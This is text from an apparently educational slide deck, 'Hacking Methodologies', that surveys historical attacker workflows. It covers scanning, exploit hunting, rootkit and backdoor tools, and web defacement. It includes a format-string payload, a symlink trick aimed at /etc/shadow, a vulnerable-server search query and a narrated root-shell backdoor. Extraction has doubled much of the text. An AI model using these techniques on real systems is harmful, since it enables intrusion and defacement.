Upload
findsahil164
View
3.749
Download
2
Embed Size (px)
DESCRIPTION
methods toknow about hacking.............
Citation preview
Hacking MethodologiesHacking Methodologies
An overview of historical hacking An overview of historical hacking approachesapproaches
Johnny LongJohnny Longhttp://johnny.ihackstuff.comhttp://johnny.ihackstuff.com
[email protected]@ihackstuff.com
Varied ApproachesVaried Approaches ““Old School”: Slow, careful, precise, Old School”: Slow, careful, precise,
invasiveinvasive ““Pros”: Fast, careful, precise, sometimes Pros”: Fast, careful, precise, sometimes
invasiveinvasive ““Skript Kiddies”: Slow, reckless, Skript Kiddies”: Slow, reckless,
imprecise, invasiveimprecise, invasive ““Defacers”: Fast, reckless, precise, mildly Defacers”: Fast, reckless, precise, mildly
invasiveinvasive
Old schoolOld school
For years, information security pundits have followed and believed in a For years, information security pundits have followed and believed in a “hacking methodology” which described the steps a hacker classically “hacking methodology” which described the steps a hacker classically followed when performing an attack. followed when performing an attack.
That methodology followed the following basic steps:That methodology followed the following basic steps:
Information GatheringInformation Gathering ProbeProbe AttackAttack
AdvancementAdvancement EntrenchmentEntrenchment
Infiltration/ExtractionInfiltration/Extraction
Old School: Information Old School: Information GatheringGathering
Decide and discover which targets to Decide and discover which targets to attackattack
Often begin with a specific network or a Often begin with a specific network or a specific companyspecific company
Whois, nslookup queriesWhois, nslookup queries samspade.orgsamspade.org Search engines (“googlescanning”)Search engines (“googlescanning”)
Old School: ProbeOld School: Probe Scan specific targets for vulnerabilitiesScan specific targets for vulnerabilities
Search sweeping ranges of ports with a portscan Search sweeping ranges of ports with a portscan (nmap)(nmap)
Grab details such as service versions from the Grab details such as service versions from the discovered ports aka “banner grabbing” (netcat)discovered ports aka “banner grabbing” (netcat)
NT: Connect to and enumerate information from NT: Connect to and enumerate information from NETBios (enum)NETBios (enum)
Search the Internet for vulnerabilities based on Search the Internet for vulnerabilities based on versions of software found on targetsversions of software found on targets
Old School: ProbeOld School: Probe NMAP ( NMAP ( http://www.insecure.org/nmaphttp://www.insecure.org/nmap)) Superscan (Superscan (http://www.http://www.webattackwebattack.com/get/.com/get/
superscansuperscan..shtmlshtml)) Nessus: (Nessus: (http://www.nessus.orghttp://www.nessus.org)) Whisker: (Whisker: (http://sourceforge.net/projects/whisker/http://sourceforge.net/projects/whisker/)) Netcat: (Netcat: (http://www.atstake.com/research/tools/http://www.atstake.com/research/tools/)) Enum (http://razor.bindview.com/tools/index.shtml)Enum (http://razor.bindview.com/tools/index.shtml) THC-Probe THC-Probe
(http://www.thehackerschoice.com/download.php?(http://www.thehackerschoice.com/download.php?t=r&d=probe-4.1.tar.gz )t=r&d=probe-4.1.tar.gz )
Old School: ProbeOld School: Probe
Nmap is used to scan the ports of the target system. Using the –O option would also report the Operating System of the target.
Old School: ProbeOld School: Probe
Nmap’s guess at the operating system type
Old School: ProbeOld School: Probe
some services listen behind RPC. rpcinfo can give us
this info.
Old School: AttackOld School: Attack Gather compatible exploits Gather compatible exploits Compile exploits (if required)Compile exploits (if required) Launch exploits against targetsLaunch exploits against targets Modify parameters, re-launch exploits (if Modify parameters, re-launch exploits (if
required)required)
Old School: AttackOld School: Attack There are many different types of attacks There are many different types of attacks
which can be broken down into several which can be broken down into several classifications. classifications.
The attacks are performed from one of two The attacks are performed from one of two perspectives:perspectives:
Local: The attacker has access to a command Local: The attacker has access to a command prompt or has gained the ability to execute prompt or has gained the ability to execute commands on the targetcommands on the target
Remote: The attacker exploits the target box Remote: The attacker exploits the target box without first gaining access to a command shellwithout first gaining access to a command shell
Attacks: Buffer OverflowAttacks: Buffer Overflow Aka the “Boundary Condition Error”: Stuff more data Aka the “Boundary Condition Error”: Stuff more data
into a buffer than it can handle. The resulting into a buffer than it can handle. The resulting overflowed data “falls” into a precise location and is overflowed data “falls” into a precise location and is executed by the systemexecuted by the system Local overflows are executed while logged into the target Local overflows are executed while logged into the target
systemsystem Remote overflows are executed by processes running on the Remote overflows are executed by processes running on the
target that the attacker “connects” totarget that the attacker “connects” to Result: Commands are executed at the privilege level Result: Commands are executed at the privilege level
of the overflowed programof the overflowed program Example: SNMPXDMID overflow (Solaris 6-8) Example: SNMPXDMID overflow (Solaris 6-8)
http://www.securityfocus.com/bid/2417http://www.securityfocus.com/bid/2417
Attacks: Input ValidationAttacks: Input Validation An process does not “strip” input before An process does not “strip” input before
processing it, ie special shell characters processing it, ie special shell characters such as semicolon and pipe symbols such as semicolon and pipe symbols
An attacker provides data in unexpected An attacker provides data in unexpected fields, ie SQL database parametersfields, ie SQL database parameters
Attacks: Input ValidationAttacks: Input Validation Example: Trillian IRC Module Format String Example: Trillian IRC Module Format String
Vulnerability Vulnerability (http://online.securityfocus.com/bid/5388)(http://online.securityfocus.com/bid/5388)
““A format string vulnerability has been reported in A format string vulnerability has been reported in the Trillian IRC module. An attacker can exploit this the Trillian IRC module. An attacker can exploit this vulnerability by enticing a user to join a channel vulnerability by enticing a user to join a channel with a malicious channel name (e.g. #%n%n%n). with a malicious channel name (e.g. #%n%n%n). An attacker in control of a malicious server may An attacker in control of a malicious server may exploit vulnerable clients who have connected.”exploit vulnerable clients who have connected.”
Attacks: Race ConditionsAttacks: Race Conditions An attacker forces an action during a sensitive time window An attacker forces an action during a sensitive time window
between two operationsbetween two operations
A program checks to make sure output file A program checks to make sure output file “/tmp/temp_output” does not exist“/tmp/temp_output” does not exist
The program wanders off and does other stuff…The program wanders off and does other stuff… An attacker quickly creates a symlink from An attacker quickly creates a symlink from
“/tmp/temp_output” to “/etc/shadow” “/tmp/temp_output” to “/etc/shadow” The program writes to the “/tmp/temp_output” which The program writes to the “/tmp/temp_output” which
clobbers “/etc/shadow”clobbers “/etc/shadow” Example: Example: RedHat Linux diskcheckRedHat Linux diskcheck
(http://online.securityfocus.com/bid/2050 )(http://online.securityfocus.com/bid/2050 )
Attacks: Environment Attacks: Environment ErrorsErrors
An attacker makes a change to a program’s An attacker makes a change to a program’s environment that was not expectedenvironment that was not expected
For example, a program relies on the UNIX For example, a program relies on the UNIX environment variable $USER to determine who environment variable $USER to determine who is running the programis running the program
An attacker changes this value to “root” before An attacker changes this value to “root” before executing the programexecuting the program
Attacks: Weak PasswordsAttacks: Weak Passwords accounts with weak passwords are accounts with weak passwords are
guessed by a remote attackerguessed by a remote attacker Accounts with weak passwords are Accounts with weak passwords are
cracked by attacker with access to a cracked by attacker with access to a password databasepassword database
THC-HYDRA Login Hacker THC-HYDRA Login Hacker (http://www.thehackerschoice.com/releases.php)(http://www.thehackerschoice.com/releases.php)
Attack: Exploit SitesAttack: Exploit Sites SecurityFocus: (SecurityFocus: (http://www.http://www.securityfocussecurityfocus.com.com)) Packetstorm: (Packetstorm: (http://http://packetstormsecuritypacketstormsecurity.org.org)) New Order: (New Order: (http://http://neworderneworder.box..box.sksk//)) Hack in the Box: (Hack in the Box: (http://www.hackinthebox.org/http://www.hackinthebox.org/
)) phreak.org (phreak.org (http://www.http://www.phreakphreak
.org/archives/exploits/.org/archives/exploits/unixunix/)/)
Old School: Attack Old School: Attack phasesphases
The Attack is most often broken into several The Attack is most often broken into several phases (perhaps running cyclically) phases (perhaps running cyclically)
Locating ExploitsLocating Exploits Getting ExploitsGetting Exploits
Modification of ExploitsModification of Exploits Building ExploitsBuilding Exploits Testing ExploitsTesting Exploits Running ExploitsRunning Exploits
Old School: Locating Old School: Locating exploitsexploits
Old School: Locating Old School: Locating exploitsexploits
Old School: Getting Old School: Getting ExploitsExploits
The ‘wget’ program downloads the exploit to the attacker’s machine
Old School: Modifying Old School: Modifying exploitexploit
(-lsocket won’t work)
Most exploits will not work across all platforms, so modifications generally need to be made. In this case, -lsocket is removed for running on out RedHat 7.2 attack box.
Old School: Building Old School: Building ExploitExploit
Some exploits come complete with a Makefile, so a simple ‘make’ command is all that’s required to build the exploit.
Old School: Building Old School: Building ExploitExploit
The make command successfully produces the exploit, in this case ‘automountdexp’
Old School: Testing Old School: Testing ExploitExploit
The ‘–h’ parameter shows the usage for this exploit.
Old School: Attack Old School: Attack Running ExploitRunning Exploit
This attack executes commands on the target (a Solaris 2.5.1 box) as root. In this case, the attacker drops a line into /etc/inet/inetd.conf and a line into /etc/services. When the system is restarted (or inet is restarted) a listening root shell is opened on port 31337.
Old School: Attack Old School: Attack Success!Success!
The attacker connects to the 31337 port on the target and is greeted with a root prompt.
Old School: Advancement Old School: Advancement (optional)(optional)
If needed, gain further access to targets If needed, gain further access to targets by further exploitationby further exploitation TrojansTrojans Local ExploitsLocal Exploits
The advancement phase will somewhat The advancement phase will somewhat mirror the Attack phases unless the mirror the Attack phases unless the attacker has already tested the exploitsattacker has already tested the exploits
Old School: Old School: EntrenchmentEntrenchment
Modify targets to ensure future accessModify targets to ensure future access BackdoorsBackdoors RootkitsRootkits
Entrenchment: BackdoorsEntrenchment: Backdoors
Linux Non-listening backdoor programs = No Linux Non-listening backdoor programs = No listening port!listening port! SAdoor SAdoor (http://cmn.listprojects.darklab.org/)(http://cmn.listprojects.darklab.org/) Cd00r Cd00r (http://www.phenoelit.de/stuff/cd00rdescr.html) (http://www.phenoelit.de/stuff/cd00rdescr.html)
NT/2KNT/2K Fake GINA Fake GINA Username and password interceptor Username and password interceptor
(http://www.rootkit.com/projects/ginatroj/ )(http://www.rootkit.com/projects/ginatroj/ )
NTKap Removes NT ACL protection NTKap Removes NT ACL protection (http://www.rootkit.com/projects/ntkap/ )(http://www.rootkit.com/projects/ntkap/ )
Entrenchment: RootkitsEntrenchment: Rootkits LinuxLinux
LRK5: LRK5: (http://online.securityfocus.com/data/tools/lrk5.src.tar.gz)(http://online.securityfocus.com/data/tools/lrk5.src.tar.gz)
ADORE: ADORE: (http://online.securityfocus.com/tools/1490 )(http://online.securityfocus.com/tools/1490 )
KNARK KNARK (http://online.securityfocus.com/tools/1163 )(http://online.securityfocus.com/tools/1163 )
NTNT NT Rootkit NT Rootkit
(http://www.rootkit.com/projects/ntroot/)(http://www.rootkit.com/projects/ntroot/) NULL.SYS NULL.SYS
(http://www.rootkit.com/projects/nullsys/ )(http://www.rootkit.com/projects/nullsys/ )
Old School: Old School: Infiltration/ExtractionInfiltration/Extraction
Install sniffers to monitor network traffic, Install sniffers to monitor network traffic, gather usernames/passwords gather usernames/passwords
Extract data from compromised systemsExtract data from compromised systems Compromise neighboring targets based Compromise neighboring targets based
on captured data or trust relationshipson captured data or trust relationships
ProfessionalsProfessionals
Professional hackers, or ethical hackers, tend to follow the following Professional hackers, or ethical hackers, tend to follow the following methodologies:methodologies:
Information GatheringInformation Gathering ProbeProbe AttackAttack
AdvancementAdvancement Infiltration/ExtractionInfiltration/Extraction
ProfessionalsProfessionals Most often, professional ethical hackers rely on Most often, professional ethical hackers rely on
“Vulnerability Scanners” to perform their jobs.“Vulnerability Scanners” to perform their jobs. NessusNessus Retina by eeyeRetina by eeye Network Associates CyberCopNetwork Associates CyberCop H.E.A.T.H.E.A.T. Internet Security Systems Internet ScannerInternet Security Systems Internet Scanner(see http://www.networkcomputing.com/1201/1201f1b1.html)(see http://www.networkcomputing.com/1201/1201f1b1.html)
ProfessionalsProfessionals
Vulnerability Scanner DemoVulnerability Scanner Demo
““Skript Kiddies”Skript Kiddies”
Skript KiddiesSkript Kiddies Skript Kiddies, named for their annoying ability to Skript Kiddies, named for their annoying ability to
(sometimes) successfully compromise a system (sometimes) successfully compromise a system using pre-written scripts, generally follow a very using pre-written scripts, generally follow a very simple simple non-cyclical non-cyclical methodology. methodology. (See http://project.honeynet.org/papers/enemy/ (See http://project.honeynet.org/papers/enemy/ for an interesting writeup on the topic)for an interesting writeup on the topic)
Exploit SelectionExploit SelectionTarget SelectionTarget Selection
AttackAttack
Skript Kiddies: Exploit Skript Kiddies: Exploit SelectionSelection
Nearly identical to the “Old School” method of Nearly identical to the “Old School” method of locating exploits, skript kiddies generally use locating exploits, skript kiddies generally use Search engines to locate exploitsSearch engines to locate exploits
Skript Kiddies are generally not a technically Skript Kiddies are generally not a technically savvy lot, so exploit selection is made based savvy lot, so exploit selection is made based on attack platforms available (generally on attack platforms available (generally Windows-based) and ease of use. Windows-based) and ease of use.
Skript Kiddies: Target Skript Kiddies: Target SelectionSelection
Most target selection involves noisy Most target selection involves noisy scanners, often launched from Windows scanners, often launched from Windows platformsplatforms
An increasing number of Skript Kiddies, An increasing number of Skript Kiddies, however, are gaining familiarity with Linux however, are gaining familiarity with Linux and use fairly standard tools such as and use fairly standard tools such as nmap.nmap.
Skript Kiddies: Attack!Skript Kiddies: Attack! Unlike old-school attacks, Skript Kiddies tools are Unlike old-school attacks, Skript Kiddies tools are
generally pre-compiled, or written in interpretive generally pre-compiled, or written in interpretive languages such as PERLlanguages such as PERL
If an exploit needs to be built, most kiddies will If an exploit needs to be built, most kiddies will not be able to get them workingnot be able to get them working
If a built exploit fails, a skript kiddie usually If a built exploit fails, a skript kiddie usually moves along to another target instead of fixing moves along to another target instead of fixing the exploit. This makes the process non-cyclical.the exploit. This makes the process non-cyclical.
““Defacers”Defacers”
Web DefacersWeb DefacersWhile “old school” methods While “old school” methods
are still in use, web defacers are still in use, web defacers statistically own the hacking statistically own the hacking
landscapelandscapehttp://www.alldas.orghttp://www.alldas.org
Profile of a web defacerProfile of a web defacer Handle: intrud3rm4nHandle: intrud3rm4n Age: 21Age: 21 Group: Leader of ISOTK (In Search of the Knowledge!)Group: Leader of ISOTK (In Search of the Knowledge!) Defacement count (8/09/02): 960 sites, 785 addresses, 175 mass Defacement count (8/09/02): 960 sites, 785 addresses, 175 mass
defacementsdefacements My favorite defacement: My favorite defacement:
http://defaced.alldas.org/mirror/2002/07/21/java.capgemini.nl/http://defaced.alldas.org/mirror/2002/07/21/java.capgemini.nl/ Country of Origin: BrazilCountry of Origin: Brazil Language: PortugueseLanguage: Portuguese Favorite Hacking food: Hamburgers and FriesFavorite Hacking food: Hamburgers and Fries Favorite Hacking Music: Metallica =)Favorite Hacking Music: Metallica =) Favorite exploit: whacking LINUX boxenFavorite exploit: whacking LINUX boxen Reason for defacing: FUNReason for defacing: FUN
Defaced: Cap GeminiDefaced: Cap Gemini
Following web defacersFollowing web defacershttp://www.alldas.org
Following web defacersFollowing web defacershttp://www.zone-h.com/en/defacements
Following web defacersFollowing web defacershttp://www.delta5.com.br/mirror/
Common Web Defacement Common Web Defacement MethodologyMethodology
Web Defacers, for the most part, have a slightly different Web Defacers, for the most part, have a slightly different methodology. Instead of basing the exploit on the methodology. Instead of basing the exploit on the target, the target is selected based on it’s vulnerability target, the target is selected based on it’s vulnerability to the exploit!to the exploit!
The web defacement methodology (again, often cyclical) The web defacement methodology (again, often cyclical) is generally as follows:is generally as follows:
Exploit SelectionExploit SelectionTarget SelectionTarget Selection
AttackAttackDefacementDefacement
Web DefacementWeb Defacement
Amateur defacers usually stick with one exploit and one target platform,,,
Defacer’s Exploit Defacer’s Exploit SelectionSelection An attacker’s level of comfort with an Operating An attacker’s level of comfort with an Operating
System will often decide the types of exploits usedSystem will often decide the types of exploits used UNIX-based attackers often opt for C-based remote overflowsUNIX-based attackers often opt for C-based remote overflows Windows-based attackers often opt for perl-based remote Windows-based attackers often opt for perl-based remote
overflows, visual basic tools, or command-line “net” overflows, visual basic tools, or command-line “net” commandscommands
Attackers with only browser-based experience or simplistic Attackers with only browser-based experience or simplistic attackers seeking privacy through proxies will opt for URL-attackers seeking privacy through proxies will opt for URL-based attacks such as UNICODE or DECODE, Front Page based attacks such as UNICODE or DECODE, Front Page exploits, or PHP-Nuke attacksexploits, or PHP-Nuke attacks
Defacer’s Search for Defacer’s Search for ExploitsExploits
Often an amateur defacer will monitor popular security sites (such as securityfocus) to select exploits
Defacer’s Target Defacer’s Target SelectionSelection
Armed with an exploit, most web defacers now Armed with an exploit, most web defacers now seek for vulnerable targets using various seek for vulnerable targets using various methodsmethods Web searchingWeb searching
NetcraftNetcraft NetstatNetstat GoogleGoogle
Host scanningHost scanning NmapNmap Custom scannersCustom scanners
Defacer’s Target Selection: Defacer’s Target Selection: Web SearchesWeb Searches
http://www.netcraft.comhttp://www.netcraft.com
Defacer’s Target Selection: Defacer’s Target Selection: Web SearchesWeb Searches
Using search engines to locate Using search engines to locate vulnerable servers is a very interesting vulnerable servers is a very interesting and fruitful technique which hasn’t been and fruitful technique which hasn’t been explored in great detail.explored in great detail.
http://johnny.ihackstuff.com/security/googledorks.shtmlhttp://johnny.ihackstuff.com/security/googledorks.shtml
Defacer’s Target Selection: Defacer’s Target Selection: Web SearchesWeb Searches
Google query: intitle:”Index of” “Apache 1.3.11”
Here, Apache 1.3.11 servers are located through creative use of the Google search engine.
Defacer’s Target Selection: Defacer’s Target Selection: Web SearchesWeb Searches
http://www.netstat.ru
Defacer’s Target Defacer’s Target Selection: Host ScanningSelection: Host Scanning
Nmap’s OS detection feature (-O) provides a decent guess as to the operating system of the target
Defacer’s Target Defacer’s Target Selection: Host ScanningSelection: Host Scanning
http://packetstormsecurity.com provides a great resource for custom vulnerability scanners.
Defacer’s AttackDefacer’s Attack Once the target and the exploit are Once the target and the exploit are
selected, the attacker launches the attack selected, the attacker launches the attack against the server.against the server.
If the attack fails, the attacker will often If the attack fails, the attacker will often modify the attack and try again.modify the attack and try again.
Questions?Questions?